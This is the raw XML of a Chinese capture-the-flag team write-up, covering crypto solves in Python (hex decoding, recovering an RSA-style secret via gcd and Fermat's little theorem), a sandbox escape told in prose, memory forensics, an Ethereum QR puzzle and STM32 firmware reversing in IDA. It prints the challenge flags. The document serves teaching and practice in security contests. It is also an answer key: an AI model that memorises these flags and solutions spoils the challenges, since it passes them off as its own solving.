      <w:r w:rsidR="00B2405E">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>清楚</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0E78">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>知识后又注意到去搜索sage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123AC251" w14:textId="61F0F88D" w:rsidR="00B2405E" w:rsidRPr="00FE0E78" w:rsidRDefault="00B2405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7C2A70" wp14:editId="7FDE9DAA">
            <wp:extent cx="5274310" cy="1010920"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1386112064" name="图片 138611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9796" w14:textId="3F68F676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(</w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidR="00B2405E" w:rsidRPr="006D6F4F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https://www.cnblogs.com/ywliao/p/9131891.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00FE0E7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0490362" w14:textId="566FDEA2" w:rsidR="00B2405E" w:rsidRPr="00B2405E" w:rsidRDefault="00B2405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BD0D8" wp14:editId="6288B46E">
            <wp:extent cx="5274310" cy="4409524"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1386112070" name="图片 138611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38D8" w14:textId="6A5E3762" w:rsid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发现有sage网站，就不用安装sage了，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D51B120" w14:textId="19028D9E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04FFBB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利用前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一个博客上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的代码，得到16进制数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D35A04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m1 = 0x666c61677b64305f7930755f4c316b655f5969  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B30FDF6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m2 = 0x586958693f5f6462616432346330356133327d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718B7AD0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使用Python进行十六进制转换字符串得到</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF38376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from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Crypto.Util.number</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F07101F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from gmpy2 import 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powmod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 as po, gmpy2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D024F53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sympy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1CAA09BB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m1 = 0x666c61677b64305f7930755f4c316b655f5969</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424417F6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m2 = 0x586958693f5f6462616432346330356133327d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495807B7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long_to_bytes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(m1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512CDF08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long_to_bytes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(m2))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417510CB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#</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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b'flag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{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d0_y0u_L1ke_Yi'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43122240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#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b'XiXi?_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dbad24c05a32}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B8B74F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5D252C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lastRenderedPageBreak/>
        <w:t>拼接起来即可：flag{d0_y0u_L1ke_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YiXiXi?_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dbad24c05a32}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4667C9CC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所以最后：NSSCTF{d0_y0u_L1ke_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YiXiXi?_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dbad24c05a32}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B57586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2024</w:t>
      </w:r>
      <w:proofErr w:type="gram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九</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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省联考</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6A440F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解题：祖煜</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C1DDFF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根据九省联考，考察的费马小定理，搜索博客</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACFEB43" w14:textId="10595B3B" w:rsidR="00FE0E78" w:rsidRDefault="00D65B7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3" w:history="1">
        <w:r w:rsidR="00B2405E" w:rsidRPr="006D6F4F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https://blog.csdn.net/jayq1/article/details/131931855</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31B5B1AA" w14:textId="455FDF9F" w:rsidR="00B2405E" w:rsidRDefault="00B2405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C6E2AA" wp14:editId="673DB544">
            <wp:extent cx="5274310" cy="5475007"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1386112072" name="图片 138611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C283" w14:textId="22B753FF" w:rsidR="00B2405E" w:rsidRPr="00B2405E" w:rsidRDefault="00B2405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77471" wp14:editId="2F5F9B91">
            <wp:extent cx="5274310" cy="3762196"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1386112073" name="图片 138611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4965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查看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一下费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马小定理的运用，得到如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE9A2A5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exp：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1196FE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import gmpy2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DA5C46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libnum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7212C6A3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n = 18179834236782025892165859358541969039672768622078317899558535972829779066590034272465041741258879770213528640616887797155080398928088158585694106907734126514213361875345507975960317351812797992725951327122851713302327820458710931182497244211627793166445441450354787055708273445176257841426295561697059359851693234672902342001564298222123930677021693824135290857682548806726262690296776413730423712555689778608531366304345258560702517364961150273435113114487840186421965955626002395362990009595593448407759619600184788649602049313701058708439962867646774483596360223764988749726613678029307186833464512585242569435003</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555B59EB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_key = 118476552772514469423839408829123686881568084739559410530632182513762275767948497896370617515610304232243387178813586955037341292134487472065403100779681596790879028615541017295308850069784579160053701513901417705288287260440705991638799403937776530500103845918133158792881614603960962682601814188630202603009924218720712732926785995598441667407216172000846897170992809799322769143678289479374783599331814417068056531798262726589994064541667463061937572961659686063985922195861351276</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0E78">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>04969713571323480832108309240510220649110629512108142189299294329845348146274638537031635599971704959419196082418167981085622698281250</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C956C35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c = 14415195091596957208690057717270843038813723273773797640804955509618976877138721476691508292484187601673314627535732234517837698631950684940570225175917508902812451340933203438247448893168609525426014319195770233401480816194489198464476480610373345480444974658239730190879678428967798637043230820661470572128997114218312981971051639788050332764374932384836724719743407759997343303062259374222621789562479046933232021478087932233308027796973486804634154183554333108258875955181959785332882009189939917648988868671919046698887438054678239786487480196578700573286352849560893479759745211457149133610748492277912237022560</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B64ECF1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p = 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gmpy2.gcd(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_key-1, n)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E2C286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flag = (int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)(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c % p)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4D7AF4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72A82D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print(libnum.n2s(flag))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AA8F68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4C4015" w14:textId="77777777" w:rsidR="00FE0E78" w:rsidRPr="00FE0E78" w:rsidRDefault="00FE0E78" w:rsidP="00FE0E7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# NSSCTF{F3RmM4t's_Li7tLe_The0Rem_1s_S0_Funny!}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59431B0D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E0E78">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>MISC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E71AF1D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real_signin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6A57F33A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解题：陈亮</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1AF679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password is md5((宫廷玉液酒 - (白云 - 黑土) * 小锤) ^ 群英荟萃) 根据这句话得到密码是（180-（-4）*40）异或80得到260 32位md5得到密码获得flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AED3C75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cale</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="22956CB5" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRPr="00393245" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>把题都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了一下发现这题能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进去，根据hint逃逸，在网上搜索逃逸把命令一个一个带进去试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597820E9" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRPr="00393245" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D668FAE" wp14:editId="22A2E5D2">
            <wp:extent cx="5274310" cy="3124200"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="14317898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7D95" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最终在这句话之后再ls发现目录下有flag，cat一下找到flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6545AF65" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E577A6F" wp14:editId="5D00E9A9">
            <wp:extent cx="5274310" cy="2749550"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="13957785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7D3E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是名取证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A7948E" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>winhex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vmem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，搜索flag找到答案</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFAC308" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2518F3A2" wp14:editId="49474CB7">
            <wp:extent cx="5274310" cy="3124200"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="12575142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1EF2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E0E78">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>ETH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400CF1B2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其疾如风</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA113F4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解题：陈亮</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D874CC1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根据破损的二维码在网上发现只要把三个角安上去即可修复 扫完得到ethereum:0x57F1b45c28eDaC71d0A9Ffb54B7d8d2733E8d599 在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以太坊上搜索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，最终在网站下发现flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A989581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E0E78">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>IOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAC4669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神秘的OLED情书2-起</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E160E1A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解题：祖煜</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F27BAC2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根据题目描述得到压缩包的解压密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423490F9" w14:textId="6CD5F141" w:rsidR="00FE0E78" w:rsidRPr="00FE0E78" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:pPr>
        <w:pStyle w:val="a7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13D80942" wp14:editId="1A26E5B2">
            <wp:extent cx="8477250" cy="2406650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1386112075" name="图片 1386112075" descr="C:\Users\祖\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\TempState\ShareServiceTempFolder\2024-03-09-12-13-12-U`_(IAQ_L)H0X7L]NP{{5S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祖\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\TempState\ShareServiceTempFolder\2024-03-09-12-13-12-U`_(IAQ_L)H0X7L]NP{{5SD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7AE4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然后解压该压缩包看到task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D68B67C" w14:textId="0D5E3126" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:pPr>
        <w:pStyle w:val="a7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3713CB3D" wp14:editId="16386A99">
            <wp:extent cx="15894050" cy="1847850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1386112076" name="图片 1386112076" descr="C:\Users\祖\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\TempState\ShareServiceTempFolder\2024-03-09-12-15-19-KV{RB(@25EP4_0N7({5PL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祖\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\TempState\ShareServiceTempFolder\2024-03-09-12-15-19-KV{RB(@25EP4_0N7({5PL73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8640" w14:textId="66953C81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DFFDD2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按照要求观察STM32单片机的引脚得到</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49194073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STM32的输入电压为3.3V</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CA497A" w14:textId="6BBA4D76" w:rsidR="00FE0E78" w:rsidRPr="00FE0E78" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:pPr>
        <w:pStyle w:val="a7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71A97DC1" wp14:editId="54876A60">
            <wp:extent cx="4552950" cy="2038350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1386112077" name="图片 1386112077" descr="C:\Users\祖\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\TempState\ShareServiceTempFolder\2024-03-09-12-17-18-Y_FJK{EGG~PEVB@R%K2D}P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祖\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\TempState\ShareServiceTempFolder\2024-03-09-12-17-18-Y_FJK{EGG~PEVB@R%K2D}PI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B506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lastRenderedPageBreak/>
        <w:t>所以flag为NSSCTF{3.3V}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3A69A5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E0E78">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>神秘的OLED情书2-转</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F396D6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解题：陈亮</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EE7CEA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直接记事本看文件，发现下面有非常像flag的，试一试发现对了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3CAB60" w14:textId="79EB0428" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:pPr>
        <w:pStyle w:val="a7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10D082F5" wp14:editId="38B459EF">
            <wp:extent cx="5276850" cy="2965450"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1386112074" name="图片 1386112074" descr="C:\Users\祖\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\TempState\ShareServiceTempFolder\2024-03-09-12-10-37-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祖\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\TempState\ShareServiceTempFolder\2024-03-09-12-10-37-image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E96F" w14:textId="557CBB35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1A2BA7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或</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000987E7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用IDA固件逆向</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AF616B" w14:textId="45905EF6" w:rsidR="00FE0E78" w:rsidRPr="00FE0E78" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:pPr>
        <w:pStyle w:val="a7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="050339D5" wp14:editId="7AD96B5E">
            <wp:extent cx="10674350" cy="2495550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1386112078" name="图片 1386112078" descr="C:\Users\祖\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\TempState\ShareServiceTempFolder\2024-03-09-12-35-08-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祖\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\TempState\ShareServiceTempFolder\2024-03-09-12-35-08-image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F7B3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lastRenderedPageBreak/>
        <w:t>看到.bin文件（二进制文件），用IDA固件逆向，由于stm32是32位的，所以要用32位</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE0E78">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ida</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE0E78">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>固件逆向</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63836D81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按照如下配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440CCF92" w14:textId="0FBF02CA" w:rsidR="00FE0E78" w:rsidRPr="00FE0E78" w:rsidRDefault="00B2405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C48897" wp14:editId="548E7A48">
            <wp:extent cx="5274310" cy="3579729"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="1386112080" name="图片 138611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E87C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设置ROM的起始地址，和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入文件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的加载地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717AABB8" w14:textId="4D5FAE86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6B92727A" wp14:editId="60A5F21F">
                <wp:extent cx="306705" cy="306705"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4" name="矩形 4" descr="file://C:%5CUsers%5C%E7%A5%96%5CDesktop%5C6th-%E5%BF%83%E8%83%9C%E4%BA%8E%E7%89%A9%E9%98%9F-wp%E5%89%AF%E6%9C%AC%5C2024-03-09-12-38-14-image.png?msec=17099674039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88D579" id="矩形 4" o:spid="_x0000_s1026" alt="file://C:%5CUsers%5C%E7%A5%96%5CDesktop%5C6th-%E5%BF%83%E8%83%9C%E4%BA%8E%E7%89%A9%E9%98%9F-wp%E5%89%AF%E6%9C%AC%5C2024-03-09-12-38-14-image.png?msec=1709967403973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" filled="f" stroked="f">
                <o:lock v:ext="edit" aspectratio="t"/>
                <w10:anchorlock/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B2405E" w:rsidRPr="00B2405E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B2405E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="305E9A3F" wp14:editId="39A4B0DA">
            <wp:extent cx="5274310" cy="6337880"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="1386112081" name="图片 138611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3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A769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找到stm32中断位置一般在开头</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B951A79" w14:textId="4B30DBD0" w:rsidR="00FE0E78" w:rsidRPr="00FE0E78" w:rsidRDefault="00B2405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30293B" wp14:editId="00EC31F3">
            <wp:extent cx="5274310" cy="1354256"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1386112082" name="图片 138611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57B1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lastRenderedPageBreak/>
        <w:t>跳转地址到0x80001A1，然后从0x80001A0开始反汇编，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03224000" w14:textId="4AF33CAA" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:pPr>
        <w:pStyle w:val="a7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6067A498" wp14:editId="4F27F51D">
            <wp:extent cx="9537700" cy="4800600"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1386112083" name="图片 1386112083" descr="C:\Users\祖\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\TempState\ShareServiceTempFolder\2024-03-09-12-39-32-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祖\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\TempState\ShareServiceTempFolder\2024-03-09-12-39-32-image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02EF" w14:textId="0044DC12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7584C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>打开字串看到flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E354C5" w14:textId="63B9FE22" w:rsidR="00FE0E78" w:rsidRPr="00FE0E78" w:rsidRDefault="00B2405E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811B2" wp14:editId="746DAD67">
            <wp:extent cx="5274310" cy="7742556"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1386112084" name="图片 138611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D863" w14:textId="77777777" w:rsidR="00FE0E78" w:rsidRPr="00FE0E78" w:rsidRDefault="00FE0E78" w:rsidP="00FE0E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E78">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">` </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE0E78">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NSSCTF{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE0E78">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>stm32_esp8266_i0t}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD73538" w14:textId="77777777" w:rsidR="00A93124" w:rsidRDefault="00A93124"/>
    <w:sectPr w:rsidR="00A931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462D7" w14:textId="77777777" w:rsidR="00D65B7E" w:rsidRDefault="00D65B7E" w:rsidP="00FE0E78">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7CE31688" w14:textId="77777777" w:rsidR="00D65B7E" w:rsidRDefault="00D65B7E" w:rsidP="00FE0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(正文）">
    <w:altName w:val="Calibri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E1443" w14:textId="77777777" w:rsidR="00D65B7E" w:rsidRDefault="00D65B7E" w:rsidP="00FE0E78">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="13467C93" w14:textId="77777777" w:rsidR="00D65B7E" w:rsidRDefault="00D65B7E" w:rsidP="00FE0E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C4"/>
    <w:rsid w:val="002010C4"/>
    <w:rsid w:val="0063350A"/>
    <w:rsid w:val="00A93124"/>
    <w:rsid w:val="00B2405E"/>
    <w:rsid w:val="00D65B7E"/>
    <w:rsid w:val="00F1723B"/>
    <w:rsid w:val="00F36B1B"/>
    <w:rsid w:val="00FE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2E03E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CF8A0914-E50E-40AC-BF2A-8CBB50515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E0E7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E0E7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E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0E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0E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0E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E0E7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E0E78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unhideWhenUsed/>
    <w:rsid w:val="00FE0E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E0E7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FE0E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FE0E78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FE0E78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B240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jpe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mrl64.github.io/2022/02/18/%E3%80%90hgame-week4%E3%80%91write-up/" TargetMode="External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cnblogs.com/ywliao/p/9131891.html" TargetMode="External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blog.csdn.net/jayq1/article/details/131931855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32</Pages>
  <Words>1157</Words>
  <Characters>6597</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>54</Lines>
  <Paragraphs>15</Paragraphs>
  <ScaleCrop>false</ScaleCrop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祖</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>祖</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-03-09T06:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-09T09:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>